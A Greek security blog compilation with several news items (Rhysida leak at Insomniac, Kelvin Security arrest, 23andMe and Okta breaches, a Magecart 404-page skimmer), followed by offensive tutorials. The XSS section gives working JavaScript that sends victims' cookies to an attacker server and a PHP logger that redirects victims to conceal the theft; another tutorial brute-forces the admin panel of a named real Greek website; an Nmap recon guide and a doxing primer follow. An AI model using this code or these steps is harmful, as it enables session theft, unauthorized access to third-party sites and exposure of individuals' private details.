Η Insomniac Games στο Στόχαστρο του Ransomware Rhysida

Posted on 12 Δεκεμβρίου 202317 Μαΐου 2024 by Αλέξανδρος Βυζάντιος

Η Insomniac κερδίζει τις εντυπώσεις με δύο βραβευμένα παιχνίδια, το Spider-Man, ενώ παράλληλα ετοιμάζεται για τον επερχόμενο τίτλο που βασίζεται στο Marvel’s Wolverine.

Ωστόσο, πρόσφατες εξελίξεις αναδεικνύουν πιθανά αρκετά ενδιαφέροντα στοιχεία σχετικά με το παιχνίδι Wolverine. Υπάρχει η πιθανότητα ορισμένες λεπτομέρειες να έχουν διαρρεύσει λόγω ενός hack, καθώς εντοπίστηκε ένα σχολιασμένο στιγμιότυπο οθόνης από το παιχνίδι στα δεδομένα απόδειξης της συμμορίας. Παρατηρούνται επίσης εικονογραφήσεις χαρακτήρων που φαίνεται να συνδέονται με άλλους ήρωες της Marvel, οι οποίοι ενδέχεται να κάνουν εμφάνιση στο παιχνίδι.

Πέραν τούτου, οι σαρώσεις αποκαλύπτουν διαβατήρια που φέρουν το όνομα πρώην ή τρέχοντος προσωπικού της Insomniac, συμπεριλαμβανομένου ενός πρώην μέλους που νυν εργάζεται στη Disney, έπειτα από απόλυσή πριν από δύο μήνες. Επίσης, ένα άλλο έγγραφο φαίνεται να ανήκει στον ηθοποιό που υποδύθηκε τον Peter Parker, γνωστό ως Spider-Man, στην πρόσφατη έκδοση του παιχνιδιού, με τον Yuri Lowenthal.

Εκτός από αυτά, τα έγγραφα που παρουσιάζονται ως αποδεικτικό υλικό για την παραβίαση περιλαμβάνουν εσωτερικά emails και υπογεγραμμένα εμπιστευτικά έγγραφα.

Related posts:

Θύμα επίθεσης το papaki.gr, δημοφιλής υπηρεσία καταχώρησης domains στη χώρα μας Η Μεγαλύτερη Συνεργασία Χάκερ στην Ιστορία: Μαζική Κυβερνοεπίθεση κατά Βαλτικής & Πολωνίας Τα πάντα σχετικά με το RFID και τις νέες ταυτότητες Αλήθειες και μύθοι σχετικά με το hacking

Η Ισπανική Αστυνομία συνέλαβε τον ιδρυτή της Kelvin Security για Κυβερνοεπιθέσεις

Posted on 11 Δεκεμβρίου 202317 Μαΐου 2024 by Αλέξανδρος Βυζάντιος

Η ισπανική αστυνομία συνέλαβε έναν από τους αρχηγούς της hacking ομάδας ‘Kelvin Security’, η οποία πιστεύεται ότι φέρεται υπεύθυνη για 300 κυβερνοεπιθέσεις εναντίον οργανισμών σε 90 χώρες από το 2020.
Η είδηση για τη σύλληψη δημοσιεύτηκε στο κανάλι του Telegram της Ισπανικής Εθνικής Αστυνομίας/

“Οι κύριοι στόχοι της ομάδας είναι κυβερνητικές ιστοσελίδες και ιδρύματα, έχοντας επιτεθεί στα Δημοτικά Συμβούλια των Getafe (Μαδρίτη), Camas (Σεβίλη), La Haba (Μπανταχόθ) και την Κυβέρνηση της Castilla-La Mancha στην Ισπανία,” αναγράφει μήνυμα στο Telegram.

Οι δράστες ήταν ενεργοί σε hacking forums, όπως τα RaidForums και BreachForums, όπου πούλαγαν τα κλεμμένα δεδομένα ή τα μοιραζαν δωρεάν σε άλλους χρήστες.

Δύο ενδεικτικά παραδείγματα παραβιάσεων της Kelvin Security είναι μια επίθεση κατά της Vodafone Italia τον Νοέμβριο του 2022 και μια παραβίαση της αμερικανικής εταιρείας συμβούλων Frost & Sullivan τον Ιούνιο του 2020.

Και στις δύο περιπτώσεις, η Kelvin Security προσπάθησε να πουλήσει τα δεδομένα που είχε αποκτήσει από τις επιθέσεις σε διάφορα hacking forums.

Η ισπανική αστυνομία δήλωσε ότι η επιχείρηση ενέπλεκε πολλές αστυνομικές μονάδες και συντονίστηκε από την Εισαγγελία του Αλικάντε.

Η αστυνομία συνέλαβε έναν από τους ηγέτες της Kelvin Security, έναν Βενεζουελανό υπήκοο, στην Αλικάντε στις 7 Δεκεμβρίου 2023.

Η αστυνομία δηλώνει ότι η έρευνα στην ομάδα ξεκίνησε τον Δεκέμβριο του 2021, κάτι που δείχνει πόσο πολύπλοκο είναι να ο εντοπισμός των hackers.

Η αστυνομία κατάσχεσε αρκετά ηλεκτρονικά αντικείμενα για την δικαστική έρευνα με την ελπίδα ότι θα οδηγήσουν στην εντοπισμό και άλλων μελών.

Η αστυνομία κοινοποίησε ένα βίντεο που δείχνει την επίθεση στο σπίτι του και τη σύλληψή του.

Related posts:

Θύμα επίθεσης το papaki.gr, δημοφιλής υπηρεσία καταχώρησης domains στη χώρα μας Η Μεγαλύτερη Συνεργασία Χάκερ στην Ιστορία: Μαζική Κυβερνοεπίθεση κατά Βαλτικής & Πολωνίας Τα πάντα σχετικά με το RFID και τις νέες ταυτότητες Αλήθειες και μύθοι σχετικά με το hacking

WordPress 6.4.2: Επιδιόρθωση κενού ασφαλείας

Posted on 11 Δεκεμβρίου 202317 Μαΐου 2024 by Αλέξανδρος Βυζάντιος

Η WordPress κυκλοφόρησε αυτήν την εβδομάδα μια ενημέρωση ασφαλείας προκειμένου να διορθώσει μια ευπάθεια εκτέλεσης κώδικα απομακρυσμένου (RCE).

Χρησιμοποιώντας σε συνδυασμό με ένα άλλο ελάττωμα, οι χάκερ θα μπορούσαν να εκτελέσουν αυθαίρετο κώδικα PHP σε έναν ιστότοπο του WordPress και καθώς σχεδόν το μισό διαδίκτυο θεωρείται ότι τρέχει σε WordPress, η επιφάνεια επίθεσης είναι αρκετά ευρεία.

Στην ανακοίνωσή της, η WordPress σημειώνει ότι το σφάλμα RCE δεν είναι απευθείας εκτελέσιμο στον πυρήνα, αλλά που, σε συνδυασμό με ορισμένα πρόσθετα, ενδέχεται να συνιστά υψηλό κίνδυνο.

Το σφάλμα RCE επιδιορθώθηκε στην έκδοση WordPress 6.4.2. Συνιστάται στους ιδιοκτήτες και τους διαχειριστές ιστότοπων να ενημερώσουν στην επιδιορθωμένη έκδοση του CMS το συντομότερο δυνατό.

“Ενώ οι περισσότεροι ιστότοποι θα πρέπει να ενημερωθούν αυτόματα στο WordPress 6.4.2, συνιστούμε ιδιαίτερα τον χειροκίνητο έλεγχο του ιστότοπό σας για να εξασφαλίσετε ότι έχει γίνει η ενημέρωση”, σημειώνει η Wordfence.

Related posts:

Θύμα επίθεσης το papaki.gr, δημοφιλής υπηρεσία καταχώρησης domains στη χώρα μας Η Μεγαλύτερη Συνεργασία Χάκερ στην Ιστορία: Μαζική Κυβερνοεπίθεση κατά Βαλτικής & Πολωνίας Τα πάντα σχετικά με το RFID και τις νέες ταυτότητες Αλήθειες και μύθοι σχετικά με το hacking

Σοβαρή Διαρροή Δεδομένων από την 23andMe: Επηρεάζονται 6.9 Εκατομμύρια Μέλη

Posted on 11 Δεκεμβρίου 202317 Μαΐου 2024 by Αλέξανδρος Βυζάντιος

Η εταιρεία γενετικής ανάλυσης 23andMe, επιβεβαίωσε  ότι χάκερ, χρησιμοποιώντας κλεμμένους κωδικούς πρόσβασης, απέκτησαν πρόσβαση στις προσωπικές πληροφορίες περίπου 6,9 εκατομμυρίων μελών της.

Ενώ οι χάκερ κατάφεραν να εισέλθουν σε περίπου 14.000 λογαριασμούς, ήτοι το 0,1% των πελατών της, κατάφεραν να δουν πληροφορίες που είχαν μοιραστεί από συγγενείς με γενετικούς δεσμούς στην 23andMe, δήλωσε εκπρόσωπος.

Η 23andMe βρίσκεται σε εξέλιξη ενημέρωσης των πελατών που επηρεάστηκαν και έχει ενισχύσει την ασφάλεια των λογαριασμών απαιτώντας από τους χρήστες να δημιουργήσουν νέους κωδικούς πρόσβασης και φυσικά προστασία 2fa.

Από τους 6,9 εκατομμύρια λογαριασμούς που κατάφεραν να πάρουν πρόσβαση,  στους 5,5 εκατομμύρια λογαριασμούς περιείχαν πληροφορίες για γενετικούς συγγενείς και ενδέχεται επίσης να περιλαμβάνουν ημερομηνίες γέννησης και τοποθεσίες, αν είχαν καταχωρηθεί από τους χρήστες, σύμφωνα με την 23andMe.

Η 23andMe ιδρύθηκε το 2006 και έχει έδρα στο Mountain View, Καλιφόρνια, όπου βρίσκεται και η έδρα της Google.

Related posts:

Θύμα επίθεσης το papaki.gr, δημοφιλής υπηρεσία καταχώρησης domains στη χώρα μας Η Μεγαλύτερη Συνεργασία Χάκερ στην Ιστορία: Μαζική Κυβερνοεπίθεση κατά Βαλτικής & Πολωνίας Τα πάντα σχετικά με το RFID και τις νέες ταυτότητες Αλήθειες και μύθοι σχετικά με το hacking

Πρώην Στέλεχος της Twitter Υποβάλλει Μήνυση εναντίον της X Corp μετά την Εξαγορά από τον Elon Musk

Posted on 6 Δεκεμβρίου 202317 Μαΐου 2024 by Αλέξανδρος Βυζάντιος

Ένας πρώην στέλεχος της Twitter Inc, που τώρα ονομάζεται X Corp, έχει υποβάλει μήνυση ισχυριζόμενος ότι απολύθηκε μετά την εξαγορά της εταιρείας από τον Elon Musk, επειδή αντιτάχθηκε σε περικοπές προϋπολογισμού που θα εμπόδιζαν την εταιρεία να συμμορφωθεί με μια συμφωνία της με την κυβέρνηση των Ηνωμένων Πολιτειών σχετικά με τις πρακτικές ασφαλείας της.

Ο Alan Rosa, που ήταν παγκοσμίως υπεύθυνος πληροφορικής ασφαλείας της Twitter, υπέβαλε την μήνυση την περασμένη Τρίτη σε ομοσπονδιακό δικαστήριο του Νιου Τζέρσεϊ κατηγορώντας για παραβίαση σύμβασης, παράνομη απόλυση και αντίποινα, μεταξύ άλλων κατηγοριών.

Η X Corp δεν ανταποκρίθηκε άμεσα σε αίτημα για σχόλιο.

Ο Rosa υποστηρίζει ότι προηγουμένως το περασμένο έτος, μετά την εξαγορά από τον Musk, του είπαν να περικόψει τον προϋπολογισμό του τμήματός του για τη φυσική ασφάλεια κατά 50% και να κλείσει λογισμικό που επέτρεπε στην Twitter να μοιράζεται πληροφορίες με αρχές επιβολής του νόμου σε όλο τον κόσμο.

Ο Rosa υποστηρίζει ότι διαφώνησε επειδή οι περικοπές θα έθεταν την Twitter σε κίνδυνο παραβίασης μιας συμφωνίας 150 εκατομμυρίων δολαρίων που είχε συνάψει το 2022 με την Ομοσπονδιακή Επιτροπή Εμπορίου (FTC) των ΗΠΑ, η οποία κατηγορούσε την Twitter για κατάχρηση προσωπικών δεδομένων χρηστών. Η συμφωνία απαιτούσε από την Twitter να υλοποιήσει ελέγχους απορρήτου και πληροφορικής ασφαλείας για την προστασία εμπιστευτικών δεδομένων.

Σύμφωνα με τη μήνυση, απολύθηκε λίγες ημέρες μετά την έκφραση αυτών των ανησυχιών. Ο Rosa ζητά αποζημίωση που δεν καθορίζεται, καθώς και τιμωρητικές ζημίες και δικαστικά έξοδα.

Η X Corp έχει κατηγορηθεί με πολλές μηνύσεις από πρώην υπαλλήλους και στελέχη από τότε που ο Musk απέκτησε την εταιρεία και μείωσε κατά περισσότερο από το ήμισυ το προσωπικό της ως μέτρο εξοικονόμησης.

Αυτές οι μηνύσεις περιλαμβάνουν ένα εύρος κατηγοριών, όπως η μη καταβολή εκατοντάδων εκατομμυρίων δολαρίων ως αποζημίωση σε πρώην υπαλλήλους, η διάκριση κατά των ηλικιωμένων υπαλλήλων, των γυναικών και των εργαζομένων με αναπηρίες, καθώς και η έλλειψη προειδοποίησης για μαζικές απολύσεις. Η X Corp έχει αρνηθεί τις κατηγορίες.

Related posts:

Θύμα επίθεσης το papaki.gr, δημοφιλής υπηρεσία καταχώρησης domains στη χώρα μας Η Μεγαλύτερη Συνεργασία Χάκερ στην Ιστορία: Μαζική Κυβερνοεπίθεση κατά Βαλτικής & Πολωνίας Τα πάντα σχετικά με το RFID και τις νέες ταυτότητες Αλήθειες και μύθοι σχετικά με το hacking

Σοκ για την Okta: Χάκερς Κλέβουν Δεδομένα Όλων των Χρηστών Συστήματος Υποστήριξης

Posted on 6 Δεκεμβρίου 202317 Μαΐου 2024 by Αλέξανδρος Βυζάντιος

Η Okta (OKTA.O) ανακοίνωσε την Τρίτη ότι χάκερς έκλεψαν πληροφορίες όλων των χρηστών του συστήματος υποστήριξης πελατών της σε μια παραβίαση του δικτύου πριν από δύο μήνες.

Η εταιρεία με έδρα το Σαν Φρανσίσκο ενημέρωσε τους πελάτες ότι κατέληξε ότι οι χάκερς απέκτησαν πρόσβαση σε δεδομένα, συμπεριλαμβανομένων ονομάτων και διευθύνσεων email, όλων των πελατών που χρησιμοποιούν το σύστημα υποστήριξης πελατών της.

Οι μετοχές της Okta κατέρρευσαν τον Οκτώβριο, αφού η εταιρεία δήλωσε ότι η παραβίαση επέτρεψε σε ορισμένους χάκερς να δουν αρχεία που είχαν ανεβάσει κάποιοι πελάτες.

“Παρόλο που δεν έχουμε άμεση γνώση ή αποδείξεις ότι αυτές οι πληροφορίες χρησιμοποιούνται ενεργά, ενημερώσαμε όλους τους πελάτες μας ότι βρίσκονται σε αυξημένο κίνδυνο ασφαλείας για επιθέσεις Phishing και social engineering”, ανέφερε η Okta.

 

Related posts:

Θύμα επίθεσης το papaki.gr, δημοφιλής υπηρεσία καταχώρησης domains στη χώρα μας Η Μεγαλύτερη Συνεργασία Χάκερ στην Ιστορία: Μαζική Κυβερνοεπίθεση κατά Βαλτικής & Πολωνίας Τα πάντα σχετικά με το RFID και τις νέες ταυτότητες Αλήθειες και μύθοι σχετικά με το hacking

Χάκερς τροποποιούν τις σελίδες 404 των ηλεκτρονικών καταστημάτων για να κλέψουν πιστωτικές κάρτες

Μια νέα μορφή επίθεσης κατά των καρτών της Magecart, καταλαμβάνει τις σελίδες σφαλμάτων 404 των ιστότοπων των διαδικτυακών πωλητών, κρύβοντας κακόβουλο κώδικα για να κλέψει τα στοιχεία των πιστωτικών καρτών των πελατών.

Η τεχνική αυτή είναι μία από τις τρεις παραλλαγές που παρατηρήθηκαν από ερευνητές της Akamai Security Intelligence Group, με τις άλλες δύο να κρύβουν τον κώδικα στο χαρακτηριστικό “onerror” της ετικέτας HTML και σε ένα δυαδικό αρχείο εικόνας για να φαίνεται ως το απόσπασμα κώδικα Meta Pixel.

Η Akamai αναφέρει ότι η επίθεση επικεντρώνεται σε ιστότοπους Magento και WooCommerce, με ορισμένα θύματα να συνδέονται με γνωστούς οργανισμούς στους τομείς των τροφίμων και του λιανικού εμπορίου.

Χειραγώγηση σελίδων 404

Όλοι οι ιστότοποι διαθέτουν σελίδες σφάλματος 404, οι οποίες εμφανίζονται στους επισκέπτες όταν έχουν πρόσβαση σε μια ιστοσελίδα που δεν υπάρχει, έχει μετακινηθεί ή έχει έναν νεκρό/σπασμένο σύνδεσμο.

Οι δράστες του Magecart αξιοποιούν την προεπιλεγμένη σελίδα “404 Not Found” για να κρύψουν και να φορτώσουν τον κακόβουλο κώδικα κλοπής καρτών, κάτι που δεν έχει παρατηρηθεί ξανά σε προηγούμενες εκστρατείες.

Ο φορτωτής skimmer είτε μεταμφιέζεται ως ένα απόσπασμα κώδικα Meta Pixel είτε κρύβεται μέσα σε τυχαία inline scripts που υπάρχουν ήδη στην παραβιασμένη ιστοσελίδα πληρωμής.

Ο φορτωτής ξεκινά ένα αίτημα λήψης σε μια σχετική διαδρομή με όνομα “icons”, αλλά καθώς αυτή η διαδρομή δεν υπάρχει στον ιστότοπο, το αίτημα καταλήγει σε σφάλμα “404 Not Found”.

Οι ερευνητές της Akamai υπέθεσαν αρχικά ότι το skimmer δεν ήταν πλέον ενεργό ή ότι η ομάδα Magecart είχε κάνει κάποιο λάθος στη διαμόρφωση. Ωστόσο, κατά την προσεκτικότερη εξέταση, διαπίστωσαν ότι ο φορτωτής περιείχε μια ταυτοποίηση κανονικής έκφρασης που αναζητούσε μια συγκεκριμένη συμβολοσειρά στην επιστρεφόμενη HTML της σελίδας 404.

Κατά τον εντοπισμό της συμβολοσειράς στη σελίδα, η Akamai βρήκε μια συνυφασμένη συμβολοσειρά κωδικοποιημένη με base64, κρυμμένη σε ένα σχόλιο. Η αποκωδικοποίηση αυτής της συμβολοσειράς αποκάλυψε το JavaScript skimmer, το οποίο κρύβεται σε όλες τις σελίδες 404.

Επειδή η αίτηση γίνεται σε μια διαδρομή πρώτου μέρους, τα περισσότερα εργαλεία ασφαλείας που παρακολουθούν ύποπτα αιτήματα δικτύου στη σελίδα πληρωμής θα το παραβλέψουν.

Κλέβοντας τα δεδομένα

Ο κώδικας skimmer εμφανίζει μια ψεύτικη φόρμα την οποία οι επισκέπτες του ιστότοπου αναμένεται να συμπληρώσουν με ευαίσθητα στοιχεία, όπως τον αριθμό της πιστωτικής τους κάρτας, την ημερομηνία λήξης και τον κωδικό ασφαλείας.

Μόλις τα δεδομένα αυτά εισαχθούν στην ψεύτικη φόρμα, το θύμα λαμβάνει ένα ψεύτικο σφάλμα “session timeout”.

Στο παρασκήνιο, όλες οι πληροφορίες κωδικοποιούνται με base64 και αποστέλλονται στον επιτιθέμενο μέσω μιας διεύθυνσης URL αίτησης εικόνας που φέρει τη συμβολοσειρά ως παράμετρο ερώτησης.

Αυτή η προσέγγιση βοηθά στην αποφυγή εντοπισμού από εργαλεία παρακολούθησης της κυκλοφορίας δικτύου, καθώς η αίτηση μοιάζει με ένα καλοήθες συμβάν ανάκτησης εικόνας. Ωστόσο, η αποκωδικοποίηση της συμβολοσειράς base64 αποκαλύπτει προσωπικές πληροφορίες και πληροφορίες πιστωτικής κάρτας.

Η περίπτωση της χειραγώγησης των σελίδων 404 αναδεικνύει τις εξελισσόμενες τακτικές και την ευελιξία των φορέων του Magecart, οι οποίοι συνεχώς δυσκολεύουν τους webmaster να εντοπίσουν τον κακόβουλο κώδικά τους σε παραβιασμένους ιστότοπους και να τον αποκαταστήσουν.

Related posts:

Θύμα επίθεσης το papaki.gr, δημοφιλής υπηρεσία καταχώρησης domains στη χώρα μας Η Μεγαλύτερη Συνεργασία Χάκερ στην Ιστορία: Μαζική Κυβερνοεπίθεση κατά Βαλτικής & Πολωνίας Τα πάντα σχετικά με το RFID και τις νέες ταυτότητες Αλήθειες και μύθοι σχετικά με το hacking

Πως θα κλέψετε τα Cookies με την μέθοδο XSS

Στον παρακάτω κώδικα θα δείτε πως μπορείτε να κλέψετε cookies κάνοντας επιθέσεις xss.

Ας ρίξουμε μια ματιά στο πρώτο script. Αυτό είναι το script/κώδικας που κάνετε inject στην σελίδα και το στέλνετε στο θύμα σας…

<script>

var server="192.168.1.6"; //your server
var phpfl= "recvCookie.php"; //your php file to reiceve the cookie
var getArg="data"; //the argument that will handle the data
var path = "http://"+server+"/"+phpfl+"?"+getArg+"="+document.cookie;

window.open(path,"_self");

</script>

Το <script> λέει στον browser του θύματος ότι ο παρακάτω κώδικας είναι της γλώσσας javascript και το </script> δείχνει στον browser που τελειώνει αυτός ο κώδικας.

Οι επόμενες τέσσερις γραμμές είναι δικές μας μεταβλητές για να μπορούμε να μην τα έχουμε όλα μπερδεμένα…

Η πρώτη μεταβλητή είναι ο δικός μας server ο όποιος θα δέχεται τα δεδομένα των cookies από τους χρήστες που θα ανοίγουν τον παραπάνω κώδικα στον browser τους.

Η δεύτερή γραμμή δείχνει που είναι το αρχείο που θα επεξεργάζεται τα δεδομένα των cookies και θα τα γράφει σε κάποιο αρχείο για να μπορούμε να τα δούμε εμείς αργότερα…

Η τρίτη γραμμή είναι το argument που θα σταλθούν τα δεδομένα. Για να το περιγράψω με τον απλό τρόπο. Είναι η μεταβλητή στον σερβερ μας. Εκεί θα πάνε τα δεδομένα πριν τα γράψουμε σε κάποιο αρχείο.

Η τελευταία μεταβλητή το μόνο που κάνει είναι να τα ενώνει όλα μαζί.

βάζει αρχικά το http:// μπροστά. ακολουθεί η διεύθυνση του server μας. Το αρχείο κλπ… μέχρι που στο τέλος υπάρχει και το document.cookie. Αυτό διαβάζει τα δεδομένα για τα cookies που είναι στον browser του θύματος.

Το αποτέλεσμά αυτής της μεταβλητής θα μοιάζει κάπως έτσι:

path=http://myserver.com?recvCookie.php?data=[Dedomena twn cookies edw]

Και έχουμε μια ακόμα εντολή… Αυτή η εντολή κάνει redirect το θύμα μας στον server μας και μάλιστα στο path…. Τα υπόλοιπα τα αναλαμβάνει το php αρχείο το όποιο είναι στον δικό μας server!

<?php
$target_site = "http://192.168.1.6"; //redirect back the user!
//http/https is required
date_default_timezone_set("UTC");
$fl = fopen("data_logs.html","a");

$data = $_GET["data"];
fwrite($fl,"<pre>\n");
fwrite($fl,"--".date("d/m/y -- h:i")."--\n");
fwrite($fl,$data."\n");
fwrite($fl,"-------------------------\n\n");

header("Location: ".$target_site);
die();

?>

Το <?php λέει στον server μας ότι ο παρακάτω κώδικας έχει γραφτεί σε γλώσσα php. To ?> λέει ότι εκεί τελειώνει ο παραπάνω κώδικας που ήταν σε php

$target_site είναι μια μεταβλητή που αποθηκεύει το site που έχουμε χακαρεί. Αυτό το αποθηκεύουμε εκεί για να κάνουμε redirect το θύμα μας πίσω στο κανονικό site όταν τσιμπήσει, με αυτόν τον τρόπο δεν θα καταλάβει καν τι έγινε (αν είναι άσχετος)

date_default_timezone_set(“UTC”);

κάνει ακριβώς αυτό που λέει :p Θα το χρειαστούμε για να ξέρουμε τι ώρα τσίμπησε το θύμα μας. Μπορείτε να το αλλάξετε να είναι στην Έλλαδα. Αντί για UTC βάλτε greece

$fl = fopen(“data_logs.html”,”a”);

Αυτή η εντολή ανοίγει ένα αρχείο με το όνομα data_logs.html. Αν δεν υπάρχει το δημιουργεί. Αν υπάρχει τότε πηγαίνει  τον κέρσορα στο τέλος του αρχείου. Με αυτόν τον τρόπο δεν διαγράφονται δεδομένα από προηγούμενα θύματα. Για να γράψουμε κάτι σε αυτό το αρχείο το κάνουμε με την fopen. To $fl βάζει τα πράγματα στο αρχείο… δεν είναι μεταβλητή (όχι με την έννοια τις μεταβλητής βασικά)

$data = $_GET[“data”];

Αυτό δεν χρειαζόταν… Αλλά ας έχουμε τα πράγματα τακτοποιημένα… Αυτό εδώ πηγαίνει  τα δεδομένα από την μεταβλητή (argument) data στην μεταβλητή $data.

$_GET[“data”];

Αυτό εδώ έχει τα δεδομένα που έστειλε το προηγούμενο script. Για να μην το καλούμε όλο αυτό τα βάλαμε στην μεταβλητή $data…

fwrite($fl,"<pre>\n");
fwrite($fl,"--".date("d/m/y -- h:i")."--\n");
fwrite($fl,$data."\n");
fwrite($fl,"-------------------------\n\n");

Η πρώτη γραμμή γράφει στο αρχείο ένα html tag το όποιο λέει να τυπώνει τα δεδομένα όπως ακριβώς του τα δίνουμε (με χαρακτήρες νέας γραμμής κλπ)

Η δεύτερή γραμμή γράφει στο αρχείο την ημερομηνία και την ώρα που το θύμα μας στάλθηκε σε αυτό το αρχείο από τον κώδικα μας.

Η τρίτη γραμμή γράφει στο αρχείο τα δεδομένα που έστειλε ο κώδικας που εκτελέστηκε στον υπολογιστή του θύματος (δηλαδή τα cookies)

H τέταρτη γραμμή γράφει:,”————————-” για να ξέρουμε που τελειώνουν τα δεδομένα. Το \n είναι χαρακτήρας νέας γραμμής, είναι σαν να πατάω enter σε ένα έγγραφό κειμένου δηλαδή.

header("Location: ".$target_site);
die();

η πρώτη γραμμή κάνει redirect τον χρήστη μας πίσω στην σελίδα που χακάραμε, με αυτόν τον τρόπο κάνουμε λίγο καμουφλάζ στην επίθεση και δεν καταλαβαίνει κάτι…

 die()

σταματάει να εκτελεί κώδικα php στον server. Δεν είναι απαραίτητο εδώ. Αλλά αν υπάρξει θέμα (πχ δεν μπορεί να γράψει τα δεδομένα στο αρχείο και καθυστέρηση πολύ να τελειώσει το θύμα μας μπορεί να καταλάβει ότι κάνουμε επίθεση. το die σταματάει αυτήν την διαδικασία… και το redirect γίνετε κανονικά)

Related posts:

Ιδεολογία Hacking Διαφορές Hacker με Cracker Γιατί η αγορά ενός crypter μπορεί να αποβεί άχρηστη ? Δωρεάν Verification χωρίς πραγματικό αριθμό τηλεφώνου.

Information Gathering με NMAP

Σε αυτό το tutorial θα χρησιμοποιήσουμε το NMAP για να συγκεντρώσουμε πληροφορίες για ανοικτές πόρτες στο στόχο μας.

Ας ξεκινήσουμε με κάποια βασικά πράγματα για το NMAP.

Χρησιμοποιώντας το NMAP μπορούμε να βρούμε ανοικτές πόρτες και εκδόσεις υπηρεσιών οι οποίες τρέχουν σε ένα server και μπορούν να μας βοηθήσουν να λάβουμε άμεση πρόσβαση εκμεταλλεύοντας οποιαδήποτε λειτουργία ή μέσω bruteforce. Επίσης μπορούν να μας βοηθήσουν να καταλάβουμε σχετικά με υπηρεσίες οι οποίες τρέχουν στο server, έτσι ώστε αργότερα μπορεί να χρειαστούν ενώ κάνουμε pentesting.

Δύο βασικοί τύποι σκαναρίσματος οι οποίοι χρησιμοποιούνται συχνότερα στο NMAP είναι το TCP connect() scanning [-sT] και το SYN scanning (γνωστό επίσης και ως half-open, ή stealth scanning) [-sS].

Για ένα απλό σκανάρισμα για πόρτες:

Nmap <IP Address>

Για ένα Stealth σκανάρισμα για πόρτες:

Nmap -sS <IP Address>

Για να σκανάρουμε την έκδοση μιας υπηρεσίας η οποία τρέχει σε ανοικτές πόρτες χρησιμοποιούμε τη μεταβλητή -sV

Nmap -sV <IP Address>

Μερικές φορές αν ένας server μπλοκάρει το ping μας και δείχνει πως δε λειτουργεί, τότε μπορούμε να χρησιμοποιήουμε τη μεταβλητή -Pn για να το σκανάρουμε

Nmap -sV -Pn <IP Address>

Για να βρούμε το λειτουργικό σύστημα μπορούμε να χρησιμοποιήσουμε το τη μεταβλητή -O

Nmap -O -Pn <IP Address>

Related posts:

Ιδεολογία Hacking Διαφορές Hacker με Cracker Γιατί η αγορά ενός crypter μπορεί να αποβεί άχρηστη ? Δωρεάν Verification χωρίς πραγματικό αριθμό τηλεφώνου.

Πως βρίσκουμε το Admin Panel μιας ιστοσελίδας

Σίγουρα όσοι έχουν βρει ένα τρωτό σημείο σε μία ιστοσελίδα και το έχουν εκμεταλλευτεί, θα απορούν και που βρίσκεται το Panel, δηλαδή η σελίδα «σύνδεσης» του Admin έτσι ώστε να βάλουν τα στοιχεία και να πάρουν πρόσβαση.

Κάποιοι όπως και εγώ, κάνουμε δοκιμές στο url της ιστοσελίδας όπως « /admin, /admin/login.php, /wp-admin, /wp-login κ.τ.λ. » έλα όμως που κάποιες φορές αυτό δεν λειτουργεί και είμαστε σε σκέψεις τύπου… -Τι γίνεται ρε δεν έχει panel;  -Το έχουν κρυμμένο; Η απάντηση είναι πως μπορεί όντως να μην το έχουν εμφανές αυτό το Panel λοιπόν και να βρίσκεται κάπου αλλού. Σε αυτήν την ανάρτηση όμως θα μάθουμε πως να το βρίσκουμε σε περίπτωση που το Website το έχει εμφανές το Panel του.

Γι’ αυτό θα σας «πλασάρω» ένα προγραμματάκι που λειτουργώ στο Linux μου και είναι κατεβασμένο από το Github (Κάποιοι από εσάς το γνωρίζετε).

Πάμε να δούμε από που μπορούμε να το κατεβάσουμε λοιπόν.

Το προγραμματάκι λέγεται Breacher.

Αφού πάμε σε αυτό το Link:  ” https://github.com/s0md3v/Breacher ” πατάμε εκεί που λέει Code πάνω δεξιά και αντιγράφουμε το Link που έχει μέσα.

Θα σας το βάλω εδώ να μην το ψάχνετε:

 https://github.com/s0md3v/Breacher.git 

Αφού λοιπόν το κάνετε αντιγραφή, πάμε μετά στο terminal μας και γράφουμε τον εξής κώδικα

Σε Root:

git clone https://github.com/s0md3v/Breacher.git

Σε απλό user: 

sudo git clone https://github.com/s0md3v/Breacher.git

Όταν λοιπόν κατεβεί το προγραμματάκι μας το οποίο έχει φτιαχτεί με γλώσσα Python, θα πρέπει να το τρέξουμε. (ΠΡΟΣΟΧΗ! Πρέπει να χρησιμοποιείτε την Python 3 για να λειτουργίσει. Υπάρχουν αναλυτικά βιντεάκια στο YouTube για το πως να την κατεβάσετε).

Μην βιάζεστε τόσο όμως. Για να τρέξουμε το προγραμματάκι πρέπει να μπούμε και στον φάκελο που βρίσκεται. Σωστά; Σωστά.

Πάμε λοιπόν και γράφουμε τον παρακάτω κώδικα (Θα σας έχω και εικόνα γιατί το υποσχέθηκα στο προηγούμενό μου post)

cd Breacher/

Μπήκαμε στον φάκελο που είναι το πρόγραμμα! Τώρα θα πρέπει να τρέξουμε το πρόγραμμα βάζοντας και την ιστοσελίδα που θέλουμε να μάθουμε το Panel. Εγώ θα χρησιμοποιήσω το eviakosmos.

Δείτε παρακάτω πως

python3 breacher.py -u http://www.eviakosmos.gr/

Με το   “  -u  ”  του δίνουμε εντολή και του λέμε θέλω να ψάξεις γι αυτήν την ιστοσελίδα  “   -u   =  στόχος   ”

Τώρα πατάμε Enter, και αρχίζει από κάτω και τρέχει ένα σωρό Links από μια wordlist. Δηλαδή; Όλα τα πιθανά. Όπως όταν θέλουμε να σπάσουμε hash από κωδικούς και τρέχουμε μία wordlist. Αυτή η μέθοδος ονομάζεται Brute Force.

Αφού τρέχει, μπορεί κάποια στιγμή να βρεί αυτό που θέλουμε. Πως θα το καταλάβουμε; Αντί για ”   [ – ]   ”   θα έχει  ”  [ + ]  ”

Δείτε τα αποτελέσματα στην παρακάτω εικόνα

[+] Admin panel found: http://www.eviakosmos.gr/administrator

Τέλεια! Βλέπουμε ότι βρήκε αυτό που θέλαμε. Πάμε να το τσεκάρουμε να δούμε αν λειτουργεί; Πάμε

Κάνουμε copy το link, ανοίγουμε το Browser μας και το κάνουμε paste στο url.

Δείτε την παρακάτω εικόνα

Related posts:

Ιδεολογία Hacking Διαφορές Hacker με Cracker Γιατί η αγορά ενός crypter μπορεί να αποβεί άχρηστη ? Δωρεάν Verification χωρίς πραγματικό αριθμό τηλεφώνου.

Doxing Βασικές πληροφορίες-Ξεκίνημα

Τι είναι doxing?
Ουσιαστικά συγκεντρώνεις όσες πληροφορίες μπορείς για ένα άτομο (στόχο).
Όταν λέμε πληροφορίες εννοούμε τα πάντα απο το όνομα, email μέχρι και τη διεύθυνση που μένει.

Τι χρειάζεστε?
Βασικές γνώσεις απο Social engineering
